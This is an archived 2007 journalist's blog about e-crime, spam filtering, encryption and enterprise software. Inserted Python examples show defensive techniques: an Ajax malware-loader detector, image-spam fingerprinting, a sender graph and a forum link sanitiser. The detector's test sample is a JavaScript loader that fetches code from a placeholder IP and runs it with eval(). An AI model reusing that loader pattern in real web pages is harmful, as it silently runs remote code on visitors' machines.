
March 30, 2007

The fact that e-crime is no longer a hobby but a profession has been repeated so often now that it no longer makes for attention-grabbing headlines. But it's always interesting to see what the crims are up to next. According to Yuval Ben-Itzhak, CTO of web security firm Finjan, the aping of traditional business models in the shady world of e-crime continues apace. Finjan researchers have uncovered instances of affiliate marketing-style operations, where webmasters are encouraged to embed Trojans or other malicious code on their site and are paid per click-through, or per poor unfortunate who lands on that site. Nice.

More research from the firm uncovered the use of Ajax, that darling technology of the Web 2.0 world, to obfuscate the downloading and execution of malware from a remote server. Because the technology lets a page make requests to remote servers without any visible change to the user's screen, and without the user clicking on anything, it can all be done behind the scenes. This means that just by visiting a page, your PC could be infected. Right, that's enough security talk for one week. Next week, back to the Hoff.
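As an added illustration (my own, not Finjan's research or anything from the original post), here is the sort of crude check a web filter can run over the inline scripts on a page: it flags a script that both creates an XMLHttpRequest and hands the response body straight to eval(), Function(), setTimeout() or document.write(), and lists any off-site hosts named in URL literals. The two sample scripts are constructed for the demonstration and are not real malware; the host 203.0.113.5 is a documentation address. It is a heuristic, so an obfuscated loader that builds its strings at runtime will slip past it; the point is what to look for, not a finished product.

```python
import re
from urllib.parse import urlparse

# Constructed sample scripts (not real malware). The first is an ordinary Ajax
# call that only updates the page; the second fetches a payload from another
# host and hands the response straight to eval().
BENIGN_SCRIPT = """
var xhr = new XMLHttpRequest();
xhr.open("GET", "/api/status", true);
xhr.onreadystatechange = function () {
  if (xhr.readyState == 4) document.getElementById("s").innerHTML = xhr.responseText;
};
xhr.send(null);
"""

LOADER_SCRIPT = """
var x = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET", "http://203.0.113.5/p.txt", true);
x.onreadystatechange = function () {
  if (x.readyState == 4) eval(x.responseText);
};
x.send(null);
"""

# The script can make background requests (2007-era IE needs the ActiveX form).
XHR_RE = re.compile(r"""\bXMLHttpRequest\b|ActiveXObject\s*\(\s*['"](?:Msxml2|Microsoft)\.XMLHTTP""", re.I)
# An Ajax response is passed to something that executes or injects it.
# Case-sensitive on purpose: JavaScript's "function" keyword must not match Function().
EXEC_SINK_RE = re.compile(
    r"\b(?:eval|Function|setTimeout|setInterval|document\.write)\s*\(\s*[^)]*?\bresponse(?:Text|XML)\b",
    re.S,
)
# Absolute URLs in string literals, to see which hosts the script talks to.
URL_RE = re.compile(r"""["'](https?://[^"'\s]+)["']""", re.I)


def analyse_script(js, page_host):
    """Classify one inline script body.

    Returns a dict with:
      xhr          - the script creates an XMLHttpRequest (or the ActiveX equivalent)
      exec_sink    - a response body flows into eval/Function/setTimeout/document.write
      remote_hosts - hosts named in URL literals other than the page's own host
      verdict      - "suspicious" when both xhr and exec_sink hold, else "ok"
    """
    hosts = {urlparse(u).hostname for u in URL_RE.findall(js)}
    hosts.discard(page_host)
    hosts.discard(None)
    xhr = bool(XHR_RE.search(js))
    exec_sink = bool(EXEC_SINK_RE.search(js))
    return {
        "xhr": xhr,
        "exec_sink": exec_sink,
        "remote_hosts": sorted(hosts),
        "verdict": "suspicious" if (xhr and exec_sink) else "ok",
    }


if __name__ == "__main__":
    for name, js in (("benign", BENIGN_SCRIPT), ("loader", LOADER_SCRIPT)):
        print(name, analyse_script(js, "www.example.com"))
```

The benign script comes back "ok" with no remote hosts, the loader "suspicious" with 203.0.113.5 listed. A gateway would normally combine a verdict like this with reputation data on the remote host rather than block on the pattern alone, since plenty of legitimate sites fetch and evaluate JSON the same way.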

March 29, 2007

The debate about Soca rages on. The trail had gone a little cold, until a raft of stories came out this week on the back of a few comments made by director general Bill Hughes and Sharon Lemon, head of the e-Crime Unit, yesterday. They admitted it had been a struggle in the first year to assimilate all the disparate agencies comprising the organisation, and that Soca is still falling short of having a "long-term impact on organised crime", but hit back at accusations that it was not handling online crime effectively.

Yet a recent forum of retail fraud managers run by 192.com Business Services has revealed these concerns are still very real. The forum was first set up last year as a means for fraud managers to share best practice and information on how to deal with attacks on their organisations, including presentations by the fuzz, MPs and even an ex-fraudster, who is now studying to be a lawyer (lots of transferable skills I suppose). Fraud managers can often be IT managers, depending on the organisation, as such a large part of the job involves dealing with phishing, screenscraping and other methods of online crime.

Again, according to 192's David Pope, a major gripe of fraud managers is that when they come to report fraud, the process is frustratingly slow and arduous. The will is clearly there to make an example of these criminals and send a strong message, but it's not among the local police force's major concerns, and Soca's remit is organised, often globally organised, crime. According to Pope a lot of retailers lamented the NHTCU's priorities being realigned within Soca, and there are even potential moves within the Met to set up a national e-crime coordination centre to bring together local forces. Other ideas to shore up this apparent hole in fraud reporting include a Home Office initiative for a National Fraud Reporting Centre…but we all know how long 'initiatives' take to set up.

March 27, 2007

It was back to Victoria today for the annual E-crime Congress, where the great and the good gathered to hear from a selection of the world’s top e-criminals, sorry e-crime experts, about the latest on the subject. From a reporting perspective it’s usually worthwhile as it makes a refreshing change from the Infosec hell of vendor self-interest stories. There’s always a fair smattering of government, law enforcement and cyber crime gurus from around the world, although in recent years, us filthy hacks have been banned from most of the sessions bar the opening keynote on each day. But, thankfully, members of the press received a note from the organisers informing them that they were free to "circulate through the exhibition and coffee areas at will". Phew, thought I was going to actually miss something important.

In the end the talk focused on phishing and online fraud, and what Soca is doing around e-crime, which it has been given a hard time about since the world-renowned NHTCU was subsumed into its gargantuan frame. Director general Bill Hughes and e-crime head Sharon Lemon acknowledged to their credit that there is still a long way to go in terms of outreach to the industry and forming alliances globally – a vital part of the fight against internet-related crime. But Hughes was more bullish when defending his organisation against some of the criticism – or rubbish, as he called it – that has been written about it in the press, mainly about it not taking e-crime as seriously as the NHTCU did. I can't comment on what goes on inside Soca, because, as they're not bound by the Freedom of Information Act, they can be rather impenetrable, but this criticism has certainly not been dreamt up by the press…I have personally spoken to businesses who are disappointed at the level of engagement and the outreach currently being made by Soca.

A lot of the time these conferences are basically just a lot of people with different opinions contradicting each other, which makes for very 'he said, she said' stories. There was a bit of that here: Joseph Sullivan from PayPal said web hosters should be encouraged to take down phishing sites earlier, perhaps with Good Samaritan legislation which absolves them of any legal liability. Others said 'are you mad? What about those countries that don't want to push through this kind of legislation?'. Which is true; there'll always be small gaps in the global fight against e-crime somewhere, and that's all there needs to be.

Which brings us on to another theme – education. Again, there were proponents, specifically William Beer, European director of Symantec's Security Practice, who said the education message needs to be tailored more to individual groups in society, like the elderly, or teenagers. He also noted that current advice on phishing often ignores the new forms of the social engineering-based attack including SMS phishing, and voice phishing, the latter being when a fraudulent phone number is included at the bottom of an email, which users are encouraged to call instead of clicking on a dodgy URL. Then of course, others, like F-Secure's Mikko Hypponen, and PayPal's Joseph Sullivan occupied the pessimist's view and maintained that no amount of education is going to do anything to stop online fraud. Better stop writing; getting a bit depressed now…

March 23, 2007

I know you're all probably sick of spam by now. I don't mean the unwanted messages clogging your inboxes, riddled with malicious links and with tempting offers of pills and powders and advice on stocks and shares. I mean the vendors who keep harping on about their solutions being the best at stopping this new epidemic of spam…well, to be honest, it doesn't seem anyone's is that good, because there's still an epidemic, isn't there? It's slowing down corporate networks as in-house systems are overwhelmed by the number and size of newer, image-based spam messages...or so they say.

Most traditional filters are unable to detect this new breed of spam and block it effectively because those clever spammers manage to make thousands of variations, each with one tiny fraction of the image altered, so that the new message sails clean through. So what to do? German web hosting firm Strato thinks it has the answer with its fingerprinting technology. Developed in partnership with the Institute of Computer Technology at the Humboldt University Berlin – boffins, white coats, you get the picture – and a certain Professor Scheffer of the Max-Planck-Institute – uber boffin – this technology works not by trying to identify every detail in a picture, but by assessing the percentage of a certain colour in a specific tone, or by "the composition or structure of individual graphics", according to Strato. It then decides the probability of that spam mail coming from the same sender as another, and is therefore able to block it. Identifying similar but not identical characteristics in this way gets around those pesky spammers' ploy to bypass filters by changing minute details of the image.
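To make the colour-proportion idea concrete, here is a toy version in Python that I've added; it is not Strato's code and makes no claim about what their fingerprint actually computes. It quantises every pixel to one of 64 coarse colours, keeps a normalised histogram as the fingerprint, and compares fingerprints by histogram intersection. The images are constructed inline as lists of RGB tuples (no image library needed): a "known spam" picture, a copy with 30 pixels scribbled over as a spammer would do to defeat an exact hash, and an unrelated picture.

```python
import random

LEVELS = 4  # quantise each colour channel to 4 tones -> 64 coarse colour bins


def quantise(value, levels=LEVELS):
    """Map a 0..255 channel value onto one of `levels` coarse tones."""
    return min(value * levels // 256, levels - 1)


def fingerprint(pixels, levels=LEVELS):
    """Normalised histogram of coarse colours over the whole image.

    pixels is a list of rows, each a list of (r, g, b) tuples. The result is
    a list of levels**3 fractions summing to 1.0; it ignores where colours sit
    in the picture, so moving or tweaking a handful of pixels barely changes it.
    """
    counts = [0] * (levels ** 3)
    total = 0
    for row in pixels:
        for r, g, b in row:
            idx = (quantise(r, levels) * levels + quantise(g, levels)) * levels + quantise(b, levels)
            counts[idx] += 1
            total += 1
    return [c / total for c in counts]


def similarity(fp_a, fp_b):
    """Histogram intersection: 1.0 for identical colour mixes, 0.0 for disjoint ones."""
    return sum(min(a, b) for a, b in zip(fp_a, fp_b))


def is_variant(known_fp, pixels, threshold=0.9):
    """True when the image's colour mix is close enough to a known spam fingerprint."""
    return similarity(known_fp, fingerprint(pixels)) >= threshold


def make_image(width, height, paint):
    return [[paint(x, y) for x in range(width)] for y in range(height)]


def perturb(pixels, n_pixels, seed=1):
    """Imitate the spammer: copy the image and scribble random colours on a few pixels."""
    rng = random.Random(seed)
    out = [list(row) for row in pixels]
    height, width = len(out), len(out[0])
    for _ in range(n_pixels):
        x, y = rng.randrange(width), rng.randrange(height)
        out[y][x] = (rng.randrange(256), rng.randrange(256), rng.randrange(256))
    return out


# Constructed images. ORIGINAL stands in for a known spam picture: a red banner on white.
ORIGINAL = make_image(32, 32, lambda x, y: (220, 30, 30) if 8 <= y < 16 else (255, 255, 255))
# VARIANT is the same picture with 30 of its 1024 pixels altered.
VARIANT = perturb(ORIGINAL, 30)
# LEGIT is an unrelated picture: a blue-purple gradient.
LEGIT = make_image(32, 32, lambda x, y: (x * 8, 60, 200))

if __name__ == "__main__":
    known = fingerprint(ORIGINAL)
    print("variant similarity %.3f -> %s" % (similarity(known, fingerprint(VARIANT)), is_variant(known, VARIANT)))
    print("legit   similarity %.3f -> %s" % (similarity(known, fingerprint(LEGIT)), is_variant(known, LEGIT)))
```

Altering 30 of 1024 pixels can move at most 3% of the mass between bins, so the variant still scores above 0.97 against the original while the gradient scores zero. The obvious limitation, and the reason Strato also talks about composition and structure, is that a histogram alone can be defeated by changing the background colour or padding the image with noise, so in practice it is one signal among several.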

Another key feature is called social graphs, which look at the relationships between senders and receivers of mail and decide whether a message being sent to your inbox is likely to have come from a particular sender. If this probability is low, chances are it is spam. There's more on the way from these clever Germans too, apparently, but I was not privy to that information when we met this week, because the patents have yet to be filed. It all sounds very exciting though…a self-learning spam filter with personalised filters for individuals.
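Here is an added sketch of what a sender-recipient graph can tell you, written by me rather than taken from Strato, whose scoring is not public. It builds a directed graph from a constructed log of past traffic (made-up addresses) and scores a new message by how the sender sits relative to the recipient: someone the recipient has written back to, someone who has mailed them before, a contact of a contact, or a complete stranger. The weights are assumptions chosen for the illustration.

```python
# Constructed history of who has mailed whom, as a mail server would log it.
# Addresses are made up.
HISTORY = [
    ("alice@example.com", "bob@example.com"),
    ("bob@example.com", "alice@example.com"),
    ("bob@example.com", "carol@example.com"),
    ("carol@example.com", "bob@example.com"),
    ("carol@example.com", "dave@example.com"),
    ("dave@example.com", "carol@example.com"),
    ("news@list.example", "alice@example.com"),
    ("news@list.example", "alice@example.com"),
]


class SocialGraph:
    """Directed graph of past mail traffic used to judge new messages."""

    def __init__(self, history):
        self.sent = {}  # sent[a][b] = number of messages a has sent to b
        for sender, recipient in history:
            self.sent.setdefault(sender, {})
            self.sent[sender][recipient] = self.sent[sender].get(recipient, 0) + 1

    def count(self, sender, recipient):
        return self.sent.get(sender, {}).get(recipient, 0)

    def neighbours(self, user):
        """Everyone `user` has exchanged mail with, in either direction."""
        out = set(self.sent.get(user, {}))
        out.update(a for a, targets in self.sent.items() if user in targets)
        return out

    def sender_probability(self, sender, recipient):
        """Rough likelihood (0..1) that `sender` legitimately writes to `recipient`.

        The four weights are illustrative assumptions, not measured values.
        """
        if self.count(recipient, sender) > 0:
            return 1.0      # the recipient has written back before: two-way relationship
        if self.count(sender, recipient) > 0:
            return 0.6      # one-way but established, e.g. a newsletter the recipient keeps
        if any(sender in self.neighbours(n) for n in self.neighbours(recipient)):
            return 0.4      # a contact of a contact: a plausible introduction
        return 0.05         # nobody near the recipient has ever dealt with this sender

    def is_likely_spam(self, sender, recipient, threshold=0.2):
        return self.sender_probability(sender, recipient) < threshold


GRAPH = SocialGraph(HISTORY)

if __name__ == "__main__":
    for s in ("alice@example.com", "news@list.example", "dave@example.com", "promo@pills.example"):
        print("%-22s -> bob: %.2f spam=%s" % (s, GRAPH.sender_probability(s, "bob@example.com"),
                                              GRAPH.is_likely_spam(s, "bob@example.com")))
```

The weak spot is visible in the scores: once a bulk sender has reached anyone in your circle, it gets the friend-of-a-friend credit when it mails you, which is why a graph score needs to be combined with content checks like the image fingerprint rather than used on its own. It also only sees what the server logs, so a first message from a genuinely new correspondent will always look like a stranger.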

March 21, 2007

Just been sitting down with web hosting firm Strato, who've launched a new e-commerce arm to their services. Makes sense…the market is potentially huge for this and many smaller firms are looking for an easy way to get their slice of it. Strato is offering three Webshop packages starting at beginner and working up to something appropriate for a fairly large mid-sized retailer. Its key differentiator seems to be simplicity of set-up and configuration and also nice little features like the ability to cross-sell on products with an also-boughts function – although a few offerings in this space are offering this now…it’s all about keeping up with the Amazons.

It’s also offering an interface with UPS for shipping, although you can also use other shippers if you want, and the ability to shift your stuff on eBay. The Webshops have also apparently been optimised so that Google’s spiders can find your shop more easily, although as what Google’s spiders do is beyond my comprehension, and that of most people outside Google, I’ll just take Strato’s word for it on this. More likely to have an effect on your online store’s visibility on the web is the ability to link your site to shopping portals like Kelkoo.

With over 20,000 Webshop customers already in Germany, Strato’s got history here; like its web hosting business, the firm is wisely moving into foreign markets only when it thinks the time is right. UK customers should benefit in that any early teething troubles Strato has encountered with the service should have been ironed out by now. And security fears should be allayed by the fact that it’s got SSL encryption – although not as yet a facility to provide the new Extended Validation version – and also that its servers are locked away in a very secure datacenter. Having visited the site myself I can vouch for the fact it is very well hidden away…I certainly wouldn’t be able to find it again.

March 15, 2007


Data loss/breach/leakage has been on my radar again this week. I met encryption specialist PGP – which stands for 'Pretty Good Privacy', not ones to blow their own trumpet, as you can see – and worked on a couple of vendor research-type stories which highlight the problems IT managers are facing with lost and stolen corporate information. The trick is to find a way of ensuring only the right people send the right data out of your organisation, and if stuff gets lost on removable devices or laptops, making sure it's going to be useless to whoever finds it.

There is a reasonably simple answer to all of this – encryption, but it's still primarily the concern of early adopters only, according to the analysts. I get the impression a lot of firms think that encryption equals PKIs, laboured implementation and management headaches, although the truth is somewhat simpler: Seagate has even started manufacturing hard disks with encryption capabilities baked in. And the stakes are pretty high these days for data breaches, as each reputation-diminishing headline proves.

PGP is an unusual company in that it began life selling solutions to enable human rights organisations to communicate safely via email, according to the press blurb, and founder Phil Zimmerman is certainly a passionate advocate of civil liberties. He told us how the original technology was designed with hacking threats from enemy governments in mind…all very cold war-Harry Palmer stuff if you ask me. But they soon realised that the evolving business landscape and the changing nature of threats provided a natural fit for encryption solutions.

We also had a good old rant about ID cards and the potential infringement of civil liberties that could occur if more efficient ways to log, control and police the population are found. "People are always talking about making things more efficient," said Zimmerman. "But if the job of the police is made really easy then basically you've got a police state. Things would be 'more efficient' if the police had total access to all your information all the time." Which is a fair point, as was another that was made – that any ID card system set up today could be abused by the government of tomorrow, or next week, or next century.

There was also a bit of a debate about the need for encryption on VoIP traffic. As the world gradually switches over to Voice over IP networks, the threat becomes more obvious – the criminals have an excellent opportunity to hack in and create havoc leveraging information gleaned from conversations. Blackmail, extortion, ID theft, the list goes on…but there is a solution.

March 14, 2007

When it comes to the land of the rising sun, the clichés are almost endless. The futuristic Blade Runner cityscapes, the achingly polite but frustratingly inscrutable locals…and those weird toilets with heated seats. Technologically Japan has also stolen a march on the west in many areas, most notably in the area of mobile services, to the extent that European operators looking to predict the success or otherwise of new mobile internet services will often look east in lieu of a crystal ball. That’s what a new piece of research by Forrester’s Niek van Veen says, anyway.

And he’s right, Japanese mobiles put the west to shame. Apart from the handsets being lighter, smaller and cooler, over half the population uses one to access the internet, and not just for email either but for more advanced services like travel information or location-based search. Case in point, my mate's band is looking to sign a deal with a large music label over there at the moment, but an absolutely key part of the deal is the percentage of music downloads the band will be paid. Now that wouldn't matter so much over here, but in Japan a major slice of revenue comes from mobile downloads – and I don't mean crazy frog ringtones – due to their popularity.

According to the report, the readiness to accept internet on-the-go in Japan was perhaps driven by the fact that SMS was originally unavailable over there. Which is true, but there are other cultural factors at play which also explain the success of the mobile net there, such as the large amount of time most Japanese commuters spend on public transport, not in the car, when they are free to use their phones. And it is without doubt the nation where to have the latest set, or be signed up to the latest service, is the primary signifier of success, cool, status etc.

According to van Veen, European firms hoping to take some pointers from the Far East and accelerate take-up over 'ere should concentrate on providing a long tail rather than a closed wall environment – the more content, and choice, the better. He also recommends social media sites as a way of luring consumers onto the mobile web, and finally location-based services like search, reservation bookings and so on. All common sense stuff which has so far eluded our mobile operators…in the meantime we'll just have to gaze enviously at the Far East.

March 11, 2007

So, as it goes, there it went; Lawson's Cue event this year, a feast of ERP featuring major upgrades to its M3 applications, further commitment to the SOA cause with the incorporation of more IBM middleware into Lawson’s underlying technology layer, and a brand spanking new initiative designed to appeal to the corporate social responsibility (CSR) aspirations of many firms these days.

On the latter, Lawson probably has as good a chance as any vendor of success. Although its plans are rather vague at the moment, organisations are crying out for ERP apps and BI technology that can help them to drive through their own initiatives, whether environmentally or ethically focused. Judging by the customers, um, both of them, that I spoke to, they are pretty keen on Lawson’s plans. At the moment its larger ERP rivals have nothing similar to offer firms, although it would be foolish to rule anything out.

In the meantime, I reckon Lawson has a pretty good chance of capitalising on being the first and could raise its profile with potential customers. As the firm's Emea VP of marketing Martin Hill told me, mid-market firms are potentially more likely to be genuinely interested in these CSR projects, rather than seeing them as a mere publicity exercise.

March 7, 2007

It’s interesting to see the evolving trends in the annual customer events that the heavyweight IT vendors throw. I remember Microsoft’s Convergence last year featuring some bizarre ethnic drumming combo in an effort to symbolise the coming together of enterprise applications, apparently. And the year before, at a Citrix event in Vegas (baby), CEO Mark Templeton bounded onto the stage in a pair of stonewashed denims, white t-shirt and possibly a baseball cap – although the mind plays tricks – to the strains of “Let’s get this party started” provided by a Citrix house band. Yeah, application acceleration…rock and roll y’all.

Obviously in a quest to go one better, or perhaps out of sheer boredom, Lawson Software’s numero one guy, Harry Debes, presented his opening keynote at this year's Cue event on Monday in a David Letterman-style mock studio, complete with leather sofa, house band (and accompanying witty repartee) and special guests. It was actually a fairly good rendering of the old Tonight Show in reality; terrible jokes, worse suits and a bunch of guests you’ve never heard of. And then a couple of penguins were thrust on stage alongside (probably) a Lawson employee inside a large furry whale suit. This sort of thing does nothing for the feeling of disorientation and uncertainty that comes after a 15 hour flight.

March 5, 2007

Ah, welcome to America. Welcome to bags of crisps the size of the average human head, though maybe not the average American’s. Welcome to id checks for anyone buying alcohol who’s below pensionable age; to wrongly spelt words and staff that smile so hard they must all be on prescription drugs.

It is, of course, the home of Silicon Valley, the epicenter of the global technology industry, or one of them, if that’s possible. And home to San Diego, which is where I’ll be most of this week sucking up Lawson Software’s annual Cue customer conference, and spitting out some nice little bitesized morsels of ERP news for you to consider. Hand on heart, it’s not the kind of subject that really gets the pulse racing is it? But Enterprise Resource Planning, and all the technology that goes along with it, is vitally important in helping firms improve their efficiency, boost revenue and productivity. It’s no wonder that the two largest ERP specialists out there, SAP and Oracle, are also two of the largest software companies in the world.

As a generalist in this game, I’ll be keen (I really will, honest) to find out what Lawson have got to offer enterprises that the big boys can’t, what they’ll be doing in terms of new products this year, and finding out what their customers think. That’s the idea anyway – wish me luck.

March 1, 2007

For all of you out there that studiously try to avoid the pompous self-important ramblings of most bloggers out there, here's another good reason: the Storm Worm. No, it's not the name of some new military armoured personnel carrier, but a new variant of a worm which first emerged in January. This time the crafty little bugger has been designed to install multiple files including a Trojan on users' PCs when they click on an email link, open an attachment or visit a malicious site. When said user then comes to write his or her blog or contribute to a bulletin board, the Trojan will insert a malicious link into the text somewhere.

According to Donal Casey of IT and business consultancy Morse, firms should educate employees as to what they should or shouldn't be clicking on. But of course, this little attack has been deliberately focused on the area of blogs and bulletin boards because, just as with social networking sites, there is a kind of assumed safety in the whole community aspect of these sites. People think no-one can, or would want to, penetrate their cosy extended circle of peers and cause mischief. So the only real way of mitigating these threats, as Casey said, is either blocking these sites altogether, or ensuring your enterprise has the appropriate content security technology that can detect this kind of malicious link and either block access to the site or remove the content before the page is loaded.
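As an added example of the "remove the content before the page is loaded" option (mine, not Morse's product or anything Casey described in detail), here is a small Python filter a forum or blog platform could run over submitted text. It pulls out HTML anchors and bare URLs, removes any whose host is on a blocklist, is a raw IP address, points at an executable, or whose visible link text shows a different host from the real target, and reports what it removed. The blocklist, the post and the hosts in it are all constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed blocklist: hosts a content gateway already knows to be bad.
BLOCKED_HOSTS = {"bad-downloads.example", "free-screensavers.example"}
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".pif", ".bat")

URL_RE = re.compile(r"""https?://[^\s<>"']+""", re.I)
ANCHOR_RE = re.compile(r"""<a\s+[^>]*href=["']([^"']+)["'][^>]*>(.*?)</a>""", re.I | re.S)


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def why_suspicious(url, anchor_text=None):
    """Return a reason string if the link should be removed, else None."""
    host = host_of(url)
    path = urlparse(url).path.lower()
    if host in BLOCKED_HOSTS:
        return "blocklisted host"
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        return "raw IP address instead of a hostname"
    if path.endswith(EXECUTABLE_SUFFIXES):
        return "link to an executable"
    if anchor_text:
        shown = URL_RE.search(anchor_text)
        if shown and host_of(shown.group(0)) != host:
            return "link text shows a different host"
    return None


def sanitise_post(text):
    """Strip suspicious links from a blog post or forum message.

    Returns (cleaned_text, findings) where findings is a list of
    (url, reason) pairs describing every link that was removed.
    """
    findings = []

    def check_anchor(match):
        url, label = match.group(1), match.group(2)
        reason = why_suspicious(url, label)
        if reason:
            findings.append((url, reason))
            return "[link removed]"
        return match.group(0)

    def check_bare(match):
        url = match.group(0)
        reason = why_suspicious(url)
        if reason:
            findings.append((url, reason))
            return "[link removed]"
        return url

    text = ANCHOR_RE.sub(check_anchor, text)   # HTML anchors first, so labels can be compared
    text = URL_RE.sub(check_bare, text)        # then any bare URLs left in the text
    return text, findings


# Constructed post: the writer's own two links plus three inserted by something
# like the trojan described above. 203.0.113.9 is a documentation address.
SAMPLE_POST = (
    'Great gig last night, photos at http://www.example.com/photos and '
    '<a href="http://www.example.com/blog">my blog</a>. '
    '<a href="http://203.0.113.9/video.exe">funny video</a> '
    '<a href="http://free-screensavers.example/get">free screensaver</a> '
    '<a href="http://signin.evil-host.example/">http://www.paypal.example/</a>'
)

if __name__ == "__main__":
    cleaned, findings = sanitise_post(SAMPLE_POST)
    print(cleaned)
    for url, reason in findings:
        print("removed", url, "-", reason)
```

The writer's own photo link and blog link survive; the three injected ones are replaced with "[link removed]" and logged with a reason. Rules this simple will not catch a link to a freshly registered hostname with a harmless-looking path, which is why real gateways lean on URL reputation feeds as well; but the structural checks (IP literals, executables, mismatched link text) are cheap and catch a lot of what a trojan pasting into a text box actually produces.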

© Incisive Media Ltd. 2008
Incisive Media Limited, Haymarket House, 28-29 Haymarket, London SW1Y 4RX, is a company registered in the United Kingdom with company registration number 04038503